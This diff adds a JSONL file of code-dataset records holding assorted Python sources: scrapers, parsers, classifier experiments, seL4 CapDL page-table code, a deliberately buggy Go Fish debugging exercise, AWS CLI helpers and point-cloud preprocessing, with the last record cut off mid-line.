diff --git "a/3971.jsonl" "b/3971.jsonl" new file mode 100644--- /dev/null +++ "b/3971.jsonl" @@ -0,0 +1,720 @@ +{"seq_id":"367709564","text":"from bs4 import BeautifulSoup\n\n\ndef html_to_text(html):\n text_info = get_text_info(html)\n words = get_words_unprocessed(html, text_info)\n texts = [text_info, words]\n return texts\n\n\ndef get_text_info(html):\n info = []\n soup = BeautifulSoup(html, \"lxml\")\n\n trials = len(soup.find_all('p'))\n info.append(trials)\n\n page = soup.find('style')\n temp = str(page.get_text().strip()).split('\\n')\n temp = temp[2:-1]\n for i in temp:\n x = i.strip()\n y = i.split(':')\n info.append(y[1].strip()[:-1])\n page = soup.find('x')\n temp = str(page.get_text().strip())\n info.append(temp)\n page = soup.find('y')\n temp = str(page.get_text().strip())\n info.append(temp)\n page = soup.find('sep')\n if page is not None:\n temp = str(page.get_text().strip())\n info.append(temp)\n return info\n\n\ndef get_words_unprocessed(html, text_info):\n temp = get_trial_texts(html)\n result = []\n x = 0\n for i in temp:\n trial = temp[x]\n x += 1\n if len(text_info) < 8:\n words = separate_words_eng(trial)\n else:\n words = separate_words_other(trial, text_info[7])\n result.append(words)\n\n return result\n\n\ndef get_trial_texts(text):\n soup = BeautifulSoup(text, \"lxml\")\n page = soup.find_all('p')\n trials = len(soup.find_all('p'))\n text = []\n for i in range(trials):\n text.append(page[i].get_text())\n\n return text\n\n\ndef separate_words_eng(text):\n result = []\n word_list = text.split('\\n')\n x = 0\n for line in word_list:\n temp = line.split()\n words = []\n for i in temp:\n words.append(\" \" + i)\n result.append(words)\n result[x].append(u'\\n')\n x += 1\n temp = sum(result, [])\n\n while temp[0] == \"\\n\" or temp[0] == \"\":\n temp = temp[1:]\n while temp[len(temp)-1] == \"\\n\" or temp[0] == \"\":\n temp = temp[:-1]\n return temp\n\n\ndef separate_words_other(text, sep):\n result = []\n word_list = text.split('\\n')\n x = 0\n for line in word_list:\n temp = line.split(sep)\n while \"\" in temp:\n temp.remove(\"\")\n result.append(temp)\n result[x].append(u'\\n')\n x += 1\n temp = sum(result, [])\n\n temp[:] = [item for item in temp if item != \"\\r\"]\n for i in range(len(temp)):\n if temp[i] == \"\\n\" and i > 1:\n tempWord = temp[i - 1][-1:len(temp[i - 1])]\n if tempWord == \"\\r\":\n temp[i - 1] = temp[i - 1][0:-2]\n\n while temp[0] == \"\\n\" or temp[0] == \"\":\n temp = temp[1:]\n while temp[len(temp)-1] == \"\\n\" or temp[len(temp)-1] == \"\":\n temp = temp[:-1]\n return temp\n\n\ndef get_num_trials(xml):\n root = xml.getroot()\n trials_id = []\n for i in range(0, len(root.getchildren())):\n nodes = root.getchildren()[i]\n trials_id.append(nodes.attrib['id'])\n\n return trials_id\n","sub_path":"EyeMap2/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"407423197","text":"\nlocalport = 9002\nIM_SIZE = (720,1280)\ndestport = 50001\ndestip = '127.0.0.1'\n\n\n\nimport connectors, time\nimport numpy as np\nimport cv2\n\ndata = ''\nmsg_size = IM_SIZE[0]*IM_SIZE[1]*3\n\nrx = connectors.RxConnector(localport)\ntx = connectors.TxConnector(destip, destport, 'TCP')\ni = 0\n\nwith rx, tx:\n while(True):\n while len(data) < msg_size:\n data += rx.recv(4096)\n rx.ack()\n data = ''\n tx.send('Hello there hunny #{}'.format(i))\n tx.ack()\n i += 
1\n","sub_path":"demo/dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"402327957","text":"#Пример решения задачи на обработку веб-страниц\n#Собственно, красивый вывод в HTML\n#По строкам и столбцам - университеты, на пересечении - количество общих ссылок\n'''\nЗадача - насколько совпадают профили университетов через английскую википедию\nСписок всех университетов Москвы: https://en.wikipedia.org/wiki/Category:Universities_in_Moscow\nпопарно сравнить между собой и определить, кто с кем имеет больше общего\nАнализ:\nищем внутри
print('<tr><th></th><th>','</th><th>'.join(allunivs_shorted),sep='\t',end='</th></tr>',file=fout)\nfor univ1 in allunivs:\n print('<tr><td>',univ1[6:].replace('_',' '),'</td>',file=fout)\n #print(univ1,end='\t')\n for univ2 in allunivs:\n #print(len(linkunivs[univ1]&linkunivs[univ2]),end='\t')\n print('<td>',len(linkunivs[univ1] & linkunivs[univ2]), end='</td>',file=fout)\n #print()# for the line break\n print('
.+)', entry=CodeEntry)\n_error = EdgeData(r='^(?P<error>\S+): (?P<msg>.+)', entry=PyErrorEntry)\n_col = EdgeData(r='^ (?P<ws>\s+)\^', entry=ColEntry)\n\n\nclass Parser(SimpleParser):\n\n @lazy\n def graph(self):\n g = DiGraph()\n g.add_edge('start', 'file', data=_file)\n g.add_edge('file', 'code', data=_code)\n g.add_edge('code', 'file', data=_file)\n g.add_edge('code', 'error', data=_error)\n g.add_edge('code', 'col', data=_col)\n g.add_edge('col', 'error', data=_error)\n return g\n\n def event(self, entries: List[OutputEntry]):\n def folder(z: Tuple[List[OutputEntry], Maybe[FileEntry]], a):\n res, cur = z\n add, new = (\n (cur, Just(a))\n if isinstance(a, FileEntry) else\n ((cur / __.set(code=Just(a))).or_else(Just(a)), Empty())\n if isinstance(a, CodeEntry) else\n (Just(a), Empty())\n )\n return res + add.to_list, new\n grouped, rest = entries.fold_left((List(), Empty()))(folder)\n complete = grouped + rest.to_list\n return Just(MultiEvent(entries=complete))\n\n__all__ = ('Parser',)\n","sub_path":"myo/output/parser/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
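The `event` method in the parser record above groups a flat entry stream into file/code units with a functional fold. A plain-Python sketch of the same grouping logic, using minimal stand-in entry classes (the class and function names here are illustrative, not the plugin's real types):

```python
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class FileEntry:                 # stand-in for the parser's file-location entry
    path: str
    code: Optional['CodeEntry'] = None

@dataclass
class CodeEntry:                 # stand-in for the offending source line
    line: str

def group_entries(entries: List[object]) -> List[object]:
    grouped, pending = [], None
    for e in entries:
        if isinstance(e, FileEntry):
            if pending is not None:   # flush a file entry that never got a code line
                grouped.append(pending)
            pending = e
        elif isinstance(e, CodeEntry):
            if pending is not None:   # attach the code line to the open file entry
                pending.code = e
                grouped.append(pending)
            else:
                grouped.append(e)     # a stray code line is emitted on its own
            pending = None
        else:
            grouped.append(e)         # error/column entries pass straight through
            pending = None
    if pending is not None:           # mirror the fold's trailing `rest`
        grouped.append(pending)
    return grouped
```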
+{"seq_id":"392535875","text":"from urllib.parse import urljoin\r\n\r\nfrom .core import *\r\nfrom .vparsers import *\r\nfrom .utils import *\r\n\r\n\r\nclass ElizjumParkParser(SingleWebpageParser):\r\n url = \"http://www.kasbuddevelopment.pl/inwestycja/elizjum-park-\"\r\n method = \"POST\"\r\n params = {\r\n \"type\": \"0\",\r\n \"area_from\": \"-1\",\r\n \"area_to\": \"-1\",\r\n \"rooms_from\": \"-1\",\r\n \"rooms_to\": \"-1\",\r\n \"building_sel\": \"-1\",\r\n \"search\": \"1\"\r\n }\r\n \r\n schema = [\r\n DataUnit(label=\"Budynek\", parser=DOMTextExtractor(), id=\"building\"),\r\n DataUnit(label=\"Numer\", parser=DOMTextExtractor(), id=\"number\"),\r\n DataUnit(label=\"Pow.\", parser=AreaParser(DOMTextExtractor()), id=\"area\"),\r\n DataUnit(label=\"Pokoje\", parser=IntParser(DOMTextExtractor()), id=\"rooms\"),\r\n DataUnit(label=\"Ogródek\", parser=AreaParser(DOMTextExtractor()), id=\"garden\"),\r\n DataUnit(label=\"Status.\", parser=StatusParser(DOMTextExtractor()), id=\"status\"),\r\n DataUnit(label=\"Plan\", parser=LinkParser(DOMElementExtractor(\"a\")), id=\"plan\"),\r\n DataUnit(label=\"Cena\", parser=PriceParser(DOMTextExtractor()), id=\"price\")\r\n ]\r\n\r\n @attributeerror_wrapper(return_value=[])\r\n def find_records(self, soup):\r\n return soup.find(\"section\", {\"id\": \"apartment-list\"}).find(\"table\")\\\r\n .find(\"tbody\").find_all(\"tr\")\r\n \r\n def split_record(self, record):\r\n return record.find_all(\"td\")\r\n \r\n def modify_record(self, record, soup=None):\r\n record[\"fid\"] = self.create_fid(record)\r\n record[\"plan\"] = urljoin(self.url, record[\"plan\"])\r\n return record\r\n \r\n def create_fid(self, record):\r\n return \"{building}/{number}\".format(**record)\r\n","sub_path":"parsers/elizjumpark.py","file_name":"elizjumpark.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"447132114","text":"#\n# Copyright 2017, Data61\n# Commonwealth Scientific and Industrial Research Organisation (CSIRO)\n# ABN 41 687 119 230.\n#\n# This software may be distributed and modified according to the terms of\n# the BSD 2-Clause license. Note that NO WARRANTY is provided.\n# See \"LICENSE_BSD2.txt\" for details.\n#\n# @TAG(DATA61_BSD)\n#\n\n'''\nWrapper around a dict of pages for some extra functionality. Only intended to\nbe used internally.\n'''\n\nfrom __future__ import absolute_import, division, print_function, \\\n unicode_literals\n\nfrom .Cap import Cap\nfrom .Object import ASIDPool, Frame\nfrom .Spec import Spec\nfrom .util import round_down, PAGE_SIZE, lookup_architecture\nimport collections\n\ndef consume(iterator):\n '''Take a generator and exhaust it. Useful for discarding the unused result\n of something that would otherwise accumulate in memory. Clagged from\n https://docs.python.org/2/library/itertools.html'''\n # feed the entire iterator into a zero-length deque\n collections.deque(iterator, maxlen=0)\n\nclass PageCollection(object):\n def __init__(self, name='', arch='arm11', infer_asid=True, vspace_root=None):\n self.name = name\n self.arch = arch\n self._pages = {}\n self._vspace_root = vspace_root\n self._asid = None\n self.infer_asid = infer_asid\n self._spec = None\n\n def add_page(self, vaddr, read=False, write=False, execute=False, size=PAGE_SIZE):\n if vaddr not in self._pages:\n # Only create this page if we don't already have it.\n self._pages[vaddr] = {\n 'read':False,\n 'write':False,\n 'execute':False,\n 'size':PAGE_SIZE,\n }\n # Now upgrade this page's permissions to meet our current requirements.\n self._pages[vaddr]['read'] |= read\n self._pages[vaddr]['write'] |= write\n self._pages[vaddr]['execute'] |= execute\n self._pages[vaddr]['size'] = size\n\n def __getitem__(self, key):\n return self._pages[key]\n\n def __iter__(self):\n return self._pages.__iter__()\n\n def get_vspace_root(self):\n if not self._vspace_root:\n vspace = lookup_architecture(self.arch).vspace()\n self._vspace_root = vspace.get_make_object()('%s_%s' % (vspace.get_type_name(), self.name))\n return self._vspace_root, Cap(self._vspace_root)\n\n def get_asid(self):\n if not self._asid and self.infer_asid:\n self._asid = ASIDPool('asid_%s' % self.name)\n self._asid[0] = self.get_vspace_root()[1]\n return self._asid\n\n def get_spec(self):\n if self._spec is not None:\n return self._spec\n\n spec = Spec(self.arch)\n\n # Page directory and ASID.\n vspace_root, vspace_root_cap = self.get_vspace_root()\n spec.add_object(vspace_root)\n asid = self.get_asid()\n if asid is not None:\n spec.add_object(asid)\n\n # Construct frames and infer page objects from the pages.\n vspace = spec.arch.vspace()\n object_counter = 0\n objects = {}\n for page_counter, (page_vaddr, page) in enumerate(self._pages.items()):\n frame = Frame('frame_%s_%04d' % (self.name, page_counter),\n page['size'])\n spec.add_object(frame)\n page_cap = Cap(frame, read=page['read'], write=page['write'],\n grant=page['execute'])\n\n # Walk the hierarchy, creating missing objects until we can\n # insert the frame\n level = vspace\n parent = vspace_root\n while level.child is not None and page['size'] < level.child.coverage:\n level = level.child\n object_vaddr = level.base_vaddr(page_vaddr)\n object_index = level.parent_index(object_vaddr)\n if (level, object_vaddr) not in objects:\n object = level.make_object('%s_%s_%04d' % (level.type_name, self.name, object_counter))\n object_counter += 1\n 
spec.add_object(object)\n object_cap = Cap(object)\n parent[object_index] = object_cap\n objects[(level, object_vaddr)] = object\n parent = parent[object_index].referent\n object_counter += 1\n parent[level.child_index(page_vaddr)] = page_cap\n\n # Cache the result for next time.\n assert self._spec is None\n self._spec = spec\n\n return spec\n\ndef create_address_space(regions, name='', arch='arm11'):\n assert isinstance(regions, list)\n\n pages = PageCollection(name, arch)\n for r in regions:\n assert 'start' in r\n assert 'end' in r\n v = round_down(r['start'])\n while round_down(v) < r['end']:\n pages.add_page(v, r.get('read', False), r.get('write', False),\n r.get('execute', False))\n v += PAGE_SIZE\n\n return pages\n","sub_path":"python-capdl-tool/capdl/PageCollection.py","file_name":"PageCollection.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
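To orient readers of the `PageCollection` record above, here is a hypothetical use of `create_address_space` (addresses and permissions invented, assuming the default 4 KiB `PAGE_SIZE`):

```python
# Two read/write pages plus one read/execute page.
regions = [
    {'start': 0x8000, 'end': 0xa000, 'read': True, 'write': True},
    {'start': 0x10000, 'end': 0x11000, 'read': True, 'execute': True},
]
pages = create_address_space(regions, name='demo', arch='arm11')

# Permissions are tracked (and merged on repeated add_page calls) per page:
assert pages[0x8000]['write'] and not pages[0x8000]['execute']
assert pages[0x10000]['execute']

# get_spec() then materialises frames, intermediate paging objects, the
# vspace root and (unless infer_asid is disabled) an ASID pool.
spec = pages.get_spec()
```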
+{"seq_id":"248987323","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import SVC\n\nfrom sklearn.utils import shuffle\n\n\ndef run_classifiers(X_train, X_test, y_train, y_test, cls=''):\n names = [\"Nearest Neighbors\", \"RBF SVM\", \"Random Forest\", \"Neural Net\"]\n\n classifiers = [\n KNeighborsClassifier(weights='distance', n_jobs=-1),\n SVC(probability=True, class_weight='balanced'),\n RandomForestClassifier(n_estimators=100, n_jobs=-1, class_weight='balanced'),\n MLPClassifier(solver='lbfgs', hidden_layer_sizes=(64, 64, 64,), max_iter=10000)]\n\n X_train, y_train = shuffle(X_train, y_train)\n\n for name, clf in zip(names, classifiers):\n print('Starting evaluation of {} for class {}'.format(name, cls))\n clf.fit(X_train, y_train)\n # predict = clf.predict(X_test)\n # print('For class {} predicted {}'.format(cls, predict))\n score = clf.score(X_test, y_test)\n\n print('For class {} - Name: [{}], Score: [{}]'.format(cls, name, score))\n\n\ndef load_split_and_test(data_file):\n print('Loading data from {}'.format(data_file))\n data = pd.read_csv(data_file, header=None)\n\n X = data.iloc[:, :-1]\n y = data.iloc[:, -1]\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.1, random_state=42)\n\n for cls in set(y_test):\n x_cls_test = X_test[y_test == cls]\n y_cls_test = y_test[y_test == cls]\n run_classifiers(X_train, x_cls_test, y_train, y_cls_test, cls)\n\n\ndef load_and_test(train_data_file, X_test, y_test):\n data = pd.read_csv(train_data_file, header=None)\n\n X = data.iloc[:, :-1]\n y = data.iloc[:, -1]\n run_classifiers(X, X_test, y, y_test)\n\n\ndef load_train_and_test(train_data_file, test_data_file):\n test_data = pd.read_csv(test_data_file, header=None)\n\n X_test = test_data.iloc[:, :-1]\n y_test = test_data.iloc[:, -1]\n load_and_test(train_data_file, X_test, y_test)\n\n\ndef main():\n # train_data_file = '/UP/Teza/classoptimizer/pendigits/pendigits.tra'\n # test_data_file = '/UP/Teza/classoptimizer/pendigits/pendigits.tes'\n # load_train_and_test(train_data_file, test_data_file)\n # load_split_and_test('/UP/Teza/classoptimizer/iris/iris.data')\n\n # 0.6 - 0.7\n data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/Games/Games.txt'\n # very poor\n # data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/huge/huge.txt'\n # 0.6 - 0.7\n # data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/demo/data.txt'\n # 1.0\n # data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/iris/iris.data'\n # 0.97-0.99\n # data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/pendigits/pendigits.tra'\n load_split_and_test(data_file)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"gym_hyperplanes/classifiers/classic_classification.py","file_name":"classic_classification.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"139168488","text":"from functools import partial\n\nfrom c2cgeoform.views.abstract_views import ListField\nfrom sqlalchemy.orm import subqueryload\n\nfrom c2cgeoportal_admin.views.treeitems import TreeItemViews\nfrom c2cgeoportal_commons.models.main import Interface, Layer\n\n_list_field = partial(ListField, Layer)\n\n\nclass LayerViews(TreeItemViews):\n\n _list_fields = TreeItemViews._list_fields + [\n _list_field(\"public\"),\n _list_field(\"geo_table\"),\n _list_field(\"exclude_properties\"),\n ]\n\n _extra_list_fields = [\n _list_field(\n \"interfaces\",\n renderer=lambda layer_wms: \", \".join(\n [i.name or \"\" for i in sorted(layer_wms.interfaces, key=lambda i: i.name)]\n ),\n sort_column=Interface.name,\n filter_column=Interface.name,\n ),\n _list_field(\n \"restrictionareas\",\n renderer=lambda layer_wms: \", \".join(\n [r.name or \"\" for r in sorted(layer_wms.restrictionareas, key=lambda r: r.name)]\n ),\n ),\n ] + TreeItemViews._extra_list_fields\n\n def _base_query(self, query):\n return super()._base_query(\n query.outerjoin(\"interfaces\")\n .options(subqueryload(\"interfaces\"))\n .options(subqueryload(\"restrictionareas\"))\n )\n","sub_path":"admin/c2cgeoportal_admin/views/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"296701908","text":"#REPETITIVAS \"ITERACION\" QUE INPRIME 5 VECES LA MISMA VARIABLE ESCRITA POR TECLADO\nimport os\nnombre=\"\"\n\n#ARGUMENTO\n#ASIGNACION DE VALORES\nnombre=os.sys.argv[1]\n\n#PROCESSING DE LA ESTRUCTURA \"ITERACION\"\nfor x in nombre:\n print(x*5)\n#fin_iterar\nprint(\"FIN DEL BUCLE\")\n","sub_path":"LIZA_DAMIAN_CARLOS/ITERACION/bucle_iteracion04.py","file_name":"bucle_iteracion04.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"536252811","text":"# This might not be finished debugging\n\n# GoFishBuggy -- a buggy Go Fish Game\n# reference: Adam Barr, Find the Bug\nimport random\ndef getCard(deck):\n\t\"\"\" Randomly remove a single card from the deck and return it. Assumes deck is not empty\n\t\"\"\"\n\tindex = int(len(deck)*random.random())\n\tnewCard= deck[index]\n\tdel deck[index]\n\treturn newCard\n\ndef drawCard(name,deck,hand):\n\t\"\"\" Draw a new card from the deck and add it to hand. If the hand now holds the rank in \n\tall four suits, remove them from the hand\n\t\"\"\"\n\tif len(deck) > 0: # non-empty deck\n\t\tnewCard = getCard(deck)\n\t\tcardRank = newCard[0]\n\t\tcardSuit=newCard[1]\n\n\t\tif cardRank in hand:\n\t\t\thand[cardRank].append(cardSuit)\n\t\t\tif len(hand) == 4:\n\t\t\t\tprint(name + \" lay down \" + cardRank + \"s\")\n\t\t\t\tdel hand[cardRank]\n\t\telse:\n\t\t\thand[cardRank] = [ cardSuit ]\n\ndef checkCard( handName, playerHand,cardRank, opponentHand):\n\t\"\"\"Check if opponentHand contains any cards of this specified rank.. If so, transfer\n\tto playerHand\n\n\tReturns 1 if a card transferred, 0 otherwise\n\t\"\"\"\n\tif cardRank in opponentHand:\n\t\ttransferCards = opponentHand[cardRank]\n\t\t#transferCards is a ist\n\t\tdel opponentHand[cardRank]\n\t\tif cardRank in playerHand:\n\t\t\tplayerHand[cardRank].extend(transferCards)\n\t\telse:\n\t\t\tplayerHand[cardRank] = transferCards\n\n\t\tif len(playerHand[cardRank])==4:\n\t\t\tprint(handName+\" lay down \", cardRank +\"s\")\n\t\t\tdel playerHand[cardRank]\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\ndef doTurn(handName, deck, playerHand, opponentHand):\n\t\"\"\" play one turn of Go Fish:\n\t- a rank in playerHand is chosen and \n\t- if any cards of that rank exist in opponentHand\n\t- they are transferred\n\t- This continues until no cards are transferred at which point\n\t- a card is drawn from the deck\n\t\"\"\"\n\n\twhile len(playerHand):\n\t\tindex = int(len(playerHand)* random.random())\n\t\trankToCheck = playerHand.keys()[index]\n\t\tfound=checkCard(handName,opponentHand, rankToCheck, playerHand)\n\t\tif found==0:\n\t\t\tbreak\n\t\n\tdrawCard(handName, deck, playerHand)\n\nranks = [\"2\",\"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"J\", \"Q\", \"K\", \"A\"]\nsuits = [ \"spades\", \"hearts\", \"diamonds\", \"clubs\"]\n\ndef playGoFish():\n\tprint(\"hello\")\n\tdeck=[]\n\thand1={}\n\thand2={}\n\tfor rank in ranks:\n\t\tfor suit in suits:\n\t\t\tdeck.append((rank,suit))\n\n\tfor i in range(7):\n\t\tdrawCard(\"HAND1\", deck, hand1)\n\t\tdrawCard(\"HAND2\", deck, hand2)\n\n\twhile 1:\n\t\tdoTurn(\"HAND1\",deck, hand1, hand2)\n\t\tdoTurn(\"HAND2\", deck, hand2, hand1)\n\t\tif len(hand1)==0 and len(hand2)==0:\n\t\t\tbreak\n\n\nplayGoFish()\n","sub_path":"debug4.py","file_name":"debug4.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"616823205","text":"# -*- coding:utf-8 -*-\nimport os\n\nBASE_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\ndef swagger():\n import subprocess\n code = subprocess.call([\n \"swagger_py_codegen\", \"-s\", \"docs/api.yaml\", \"-p\", \"propellant\", BASE_DIR\n ])\n\n return code\n","sub_path":"flak/commands/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"193445298","text":"import re\n\ndef abbreviate(long):\n '''Converts a phrase to its acronym\n \n Keyword arguments\n long -- the phrase to convert\n\n returns a string\n\n '''\n x = 0\n y = 1\n acro = ''\n \n # determines the pattern to search for in long\n for l in long:\n if l.isupper():\n acro += l[0]\n elif ':' in long:\n pattern = '(^\\w+):\\s'\n x = 1 \n elif ',' in long:\n pattern = '(^\\w)\\w+\\s(\\w)\\w+,\\s(\\w)\\w+\\s(\\w)\\w+'\n x = 4 \n elif '-' in long:\n pattern = '(^\\w)\\w+\\s(\\w)\\w+-(\\w)\\w+\\s(\\w)'\n x = 4\n else:\n pattern = '(^\\w)\\w+\\s(\\w)\\w+\\s(\\w)'\n x = 3\n\n # searches long for selected pattern\n match = re.search(pattern, long)\n\n # returns HTML or loops through match to return correct acronym\n if acro != 'HTML':\n acro = '' \n while y <= x:\n acro += match.group(y)\n y += 1\n\n return acro.upper()\n","sub_path":"python/acronym/acronym.py","file_name":"acronym.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"255496699","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_one_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/medialive/update-reservation.html\nif __name__ == '__main__':\n \"\"\"\n\tdelete-reservation : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/medialive/delete-reservation.html\n\tdescribe-reservation : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/medialive/describe-reservation.html\n\tlist-reservations : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/medialive/list-reservations.html\n \"\"\"\n\n parameter_display_string = \"\"\"\n # reservation-id : Unique reservation ID, e.g. â1234567â\n \"\"\"\n add_option_dict = {}\n\n #######################################################################\n # parameter display string\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_one_parameter(\"medialive\", \"update-reservation\", \"reservation-id\", add_option_dict)\n\n\n\n\n\n","sub_path":"medialive_write_1/reservation_update.py","file_name":"reservation_update.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"145812535","text":"from distutils.version import LooseVersion\n\nimport pytest\nfrom numpy.testing import assert_almost_equal\n\nfrom pyproj import CRS, Proj, proj_version_str, transform\n\n\n@pytest.mark.parametrize(\"proj_class\", [Proj, CRS])\ndef test_datum(proj_class, aoi_data_directory):\n p1 = proj_class(proj=\"latlong\", datum=\"WGS84\")\n s_1 = -111.5\n s_2 = 45.25919444444\n p2 = proj_class(proj=\"utm\", zone=10, datum=\"NAD27\")\n x2, y2 = transform(p1, p2, s_1, s_2)\n if LooseVersion(proj_version_str) < LooseVersion(\"6.3.0\"):\n assert_almost_equal((x2, y2), (1402291.0833290431, 5076289.591846835))\n else:\n # https://github.com/OSGeo/PROJ/issues/1808\n assert_almost_equal((x2, y2), (1402285.9829252, 5076292.4212746))\n","sub_path":"test/test_datum.py","file_name":"test_datum.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"604842255","text":"import pathlib\nimport pickle\nimport time\nfrom collections import defaultdict\n\nimport numpy as np\nfrom skimage import io as imgio\n\nfrom second.core import box_np_ops\nfrom second.core import preprocess as prep\nfrom second.core.geometry import points_in_convex_polygon_3d_jit\nfrom second.core.point_cloud.bev_ops import points_to_bev\nfrom second.data import kitti_common as kitti\n\n\ndef merge_second_batch(batch_list, _unused=False):\n example_merged = defaultdict(list)\n for example in batch_list:\n for k, v in example.items():\n example_merged[k].append(v)\n ret = {}\n example_merged.pop(\"num_voxels\")\n for key, elems in example_merged.items():\n if key in [\n 'voxels', 'num_points', 'num_gt', 'gt_boxes', 'voxel_labels',\n 'match_indices'\n ]:\n ret[key] = np.concatenate(elems, axis=0)\n elif key == 'match_indices_num':\n ret[key] = np.concatenate(elems, axis=0)\n elif key == 'coordinates':\n coors = []\n for i, coor in enumerate(elems):\n coor_pad = np.pad(\n coor, ((0, 0), (1, 0)),\n mode='constant',\n constant_values=i)\n coors.append(coor_pad)\n ret[key] = np.concatenate(coors, axis=0)\n else:\n ret[key] = np.stack(elems, axis=0)\n return ret\n\n\ndef prep_pointcloud(input_dict,\n root_path,\n voxel_generator,\n target_assigner,\n db_sampler=None,\n max_voxels=20000,\n class_names=['Car'],\n remove_outside_points=False,\n training=True,\n create_targets=True,\n shuffle_points=False,\n reduce_valid_area=False,\n remove_unknown=False,\n gt_rotation_noise=[-np.pi / 3, np.pi / 3],\n gt_loc_noise_std=[1.0, 1.0, 1.0],\n global_rotation_noise=[-np.pi / 4, np.pi / 4],\n global_scaling_noise=[0.95, 1.05],\n global_loc_noise_std=(0.2, 0.2, 0.2),\n global_random_rot_range=[0.78, 2.35],\n generate_bev=False,\n without_reflectivity=False,\n num_point_features=4,\n anchor_area_threshold=1,\n gt_points_drop=0.0,\n gt_drop_max_keep=10,\n remove_points_after_sample=True,\n anchor_cache=None,\n remove_environment=False,\n random_crop=False,\n reference_detections=None,\n add_rgb_to_points=False,\n lidar_input=False,\n unlabeled_db_sampler=None,\n out_size_factor=2,\n min_gt_point_dict=None,\n bev_only=False,\n use_group_id=False,\n out_dtype=np.float32):\n \"\"\"convert point cloud to voxels, create targets if ground truths \n exists.\n \"\"\"\n points = input_dict[\"points\"]\n\n voxel_size = voxel_generator.voxel_size\n pc_range = voxel_generator.point_cloud_range\n grid_size = voxel_generator.grid_size\n # [352, 400]\n\n voxels, coordinates, num_points = voxel_generator.generate(\n points, max_voxels)\n\n example = {\n 'voxels': voxels,\n 'num_points': num_points,\n 'coordinates': coordinates,\n \"num_voxels\": np.array([voxels.shape[0]], dtype=np.int64)\n }\n # example.update({\n # 'rect': rect,\n # 'Trv2c': Trv2c,\n # 'P2': P2,\n # })\n # if not lidar_input:\n feature_map_size = grid_size[:2] // out_size_factor\n feature_map_size = [*feature_map_size, 1][::-1]\n if anchor_cache is not None:\n anchors = anchor_cache[\"anchors\"]\n anchors_bv = anchor_cache[\"anchors_bv\"]\n matched_thresholds = anchor_cache[\"matched_thresholds\"]\n unmatched_thresholds = anchor_cache[\"unmatched_thresholds\"]\n else:\n ret = target_assigner.generate_anchors(feature_map_size)\n anchors = ret[\"anchors\"]\n anchors = anchors.reshape([-1, 7])\n matched_thresholds = ret[\"matched_thresholds\"]\n unmatched_thresholds = ret[\"unmatched_thresholds\"]\n anchors_bv = box_np_ops.rbbox2d_to_near_bbox(\n anchors[:, [0, 1, 3, 4, 6]])\n example[\"anchors\"] = anchors\n # print(\"debug\", 
